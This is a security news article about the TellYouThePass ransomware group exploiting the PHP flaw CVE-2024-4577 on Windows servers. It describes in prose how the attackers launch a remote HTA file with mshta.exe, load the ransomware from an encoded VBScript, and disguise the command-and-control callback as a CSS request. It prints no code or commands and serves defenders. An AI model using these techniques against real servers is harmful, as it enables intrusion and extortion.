Fraud Management & Cybercrime
,
Governance & Risk Management
,
Patch Management
Flaw Allows Unauthenticated Attackers to Execute Arbitrary Code
A ransomware operation with a history of exploiting widespread internet vulnerabilities lost little time in making use of a critical severity vulnerability in Window installations of web-scripting language PHP.
See Also: OnDemand | Defining a Detection & Response Strategy
Imperva Threat Research in a Monday report said TellYouThePass ransomware operators began exploiting the PHP bug, tracked as CVE-2024-4577, hours after researchers released a proof-of-concept script (see: Critical PHP Vulnerability Threatens Windows Servers).
The TellYouThePass ransomware group, active since 2019, sees opportunity in cyber incidents that have system administrators globally scrambling to patch systems. It was among the cybercriminal groups to jump on the 2021 vulnerability known as Log4Shell. Security researchers say it has a history of appearing in new forms. Chinese network security firm Snagfor spotted it in March.
Imperva researchers said Monday they observed multiple hacking attempts against Windows PHP systems involving webshell uploads and efforts to deploy ransomware.
Attackers use the PHP flaw to execute arbitrary PP code by using the PHP system
function to run an HTML application file hosted on a hacker-controlled web server. The attackers use mshta.exe
to launch the attack – mshta.exe
is a “native Windows binary that can execute remote payloads, pointing to the attackers operating in a ‘living off the land’ style,” wrote Imperva researchers.
The initial infection involves an HTML application named dd3.hta
containing a malicious VBScript. This VBScript included a base64 encoded string that, when decoded, revealed bytes of a binary loaded into memory during runtime.
The extracted bytes revealed a serialized method, which loads a Portable Executable file into memory during runtime – a .NET variant of the TellYouThePass ransomware. Once executed, the file sends an HTTP request to the command-and-control server, containing details about the infected machine. The callback masquerades as a request to retrieve CSS resources, likely to evade detection.
The command and control IP was hardcoded in the sample studied by Imperva. The malware concludes by publishing a ReadMe message in the web root directory, providing details necessary for a ransom payment.